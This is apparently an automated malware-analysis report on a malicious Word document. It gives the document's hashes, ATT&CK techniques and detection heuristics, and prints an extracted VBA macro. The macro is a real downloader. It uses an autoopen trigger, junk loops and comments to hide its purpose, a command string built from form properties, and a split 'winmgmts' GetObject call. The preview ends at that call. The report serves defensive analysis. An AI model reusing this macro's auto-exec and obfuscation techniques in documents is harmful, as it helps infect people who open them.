Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9937a81a55b1205d…

MALICIOUS

Office (OLE)

140.6 KB Created: 2019-05-08 06:44:00 Authoring application: Microsoft Office Word First seen: 2020-05-25
MD5: 61fe10e70f70f5cd05a23b7b42d9bfe3 SHA-1: 8f8c230dd12b8523ee9a9f9538787d4831e49c89 SHA-256: 9937a81a55b1205d1c436992bde547496754ce77a29177eaed7d1673032f37d3
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1137.001 DLL Search Order Hijacking T1059 Command and Scripting Interpreter

The sample contains VBA macros with an autoopen function, indicating it is designed to execute automatically upon opening. Critical heuristics indicate the use of WMI (Win32_Process.Create) and obfuscated API calls like 'winmgmts', suggesting the macro's purpose is to launch external processes. This is consistent with a downloader or dropper malware.

Heuristics 9

  • ClamAV: Doc.Downloader.Smpowloadbb-6965298-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6965298-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7481 bytes
SHA-256: 3a94cea38ac5832469e3f3ff172f0d0192b144374d0cbf928a1090c20acd0c28
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "k81796"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "X_1667_4"
Attribute VB_Base = "0{A1E87136-6F6B-4B31-812F-75C8CB5D59ED}{5AC2E1ED-CF8A-4FA7-A059-6A1550D113CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "a0146718"

Attribute VB_Name = "w6579506"

Attribute VB_Name = "Y10483"

Attribute VB_Name = "v0402_8"
Attribute VB_Base = "0{62271D62-2103-4E25-A76B-0E8D05BAE4FE}{07B30E92-0078-420E-88F7-EC430DD2DC45}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "d9813111"
Function F765808(z448983)
         While A77125 And u3720840
'u4436999X9602373A_3646X20045
'C9103528p91712s_19_1O2175153
'F6079722F0284166r19721n8495311
      Wend
         While i8897_4 And t_1_2249
'i4368296f272427f498264i72334
'U31795L8407_7l4082_4z165_48
'P000011_O77_8061O487369n1353366
      Wend
Set F765808 = CVar(z448983)
         While Q5033_11 And X3_352
'M9242211h7_9209P5932860J6_163
'A393216Q81163O56_78o91865
'Q9_31399G293840r07576N699035
      Wend
         While c7_5032 And d45411
'i_0158R45_46i596627I6109479
'w47207z848230O886533S27_03
'C4_4_0i075591N2477150K__015
      Wend
         While I6583_2 And q3823_43
'i80_92_1F5798664n_786_83i10090
'i640609w586157D3606905i9_031
'V069024a9773910m_7118t_756312
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While P1_5_150 And l8017977
'd74079a854255G76293D69805
'n488293T7557674A2205_8U98370
'm7_457i196135o4864963K849635
      Wend
         While F02275 And D92_83
'q2267054J_978792n333058j529723_
'O5039226b3616_r8223635J66865
'w15290N6_148F77234H_4_708
      Wend
         While j565939 And u181_03
'Q6667_f8631157P47568E32217
'V00297i2120_q6_370_T0_7670
'f79_6917h942194i76_1758G638158
      Wend
Call X175321
         While p212509 And j0707_5
'w7__0_90M44800_A503_4_4Q474373
'O1569444n_7778Q_8_88F7111852
'i02_8_71k9_7070R59__3P22766
      Wend
         While M79941_ And R_2609
'i68651z9230175s09_51a_9615
'K21_06P4954448u_67175V_58959
'S864698j12718v771679w08116
      Wend
         While V243__ And F278_24
'A46694N9906124S396076E_4_9157
'p7036834E6459_4W_197_9A9151799
'O08395i029902o0338854h597153
      Wend
End Sub


Attribute VB_Name = "j45_4318"
Function X175321()
On Error Resume Next
         While s660676 And A2670_68
'h_22_065O8102340T283572X1507288
'B135684b787305w95986u06857_3
'J936266o52_28f3348079u219406
      Wend
         While z084_956 And B575833
'd7308_17B2335_5V387160D863709
'A_5_38_5L353_989G40366p65632
'D6_178b47576t28823d07_5914
      Wend
         While J658423_ And E76__75
'r495749i4674_6z031753o5277779
'D956484Z4662_H994305S_9__66
't75_4302M_18236E0_16044a91541
      Wend
r1577825 = X_1667_4.Y168_96.PasswordChar + v0402_8.Q3_285 + X_1667_4.Y168_96 + v0402_8.Q7_611 + X_1667_4.Y168_96 + X_1667_4.Y168_96.PasswordChar + v0402_8.V68210 + X_1667_4.Y168_96.ControlTipText + X_1667_4.Y168_96.PasswordChar + v0402_8.r75_25 + X_1667_4.Y168_96.ControlTipText + v0402_8.a2_901_ + X_1667_4.Y168_96.ControlTipText
         While j57648_ And X43140
'L461767M429350_p4198490V5361_
'a___84X53_52_O26090i60179
'j551078s4889464o4492402f07_498
      Wend
         While Q13675 And w7188363
'T27338_f9802361z83964U4_0920
'b107785N9_523F9251_c719_7
'u1_465N6146_38A2__629E58180
      Wend
         While E323275 And q4188541
'N99856a74235o30_98_C5809687
'j469913f8182382Y799_4Y918619
'P52_69F196724o107667J0_2_032
      Wend
Set b2547_83 = F765808(GetObject("winmg" + "mts:
... (truncated)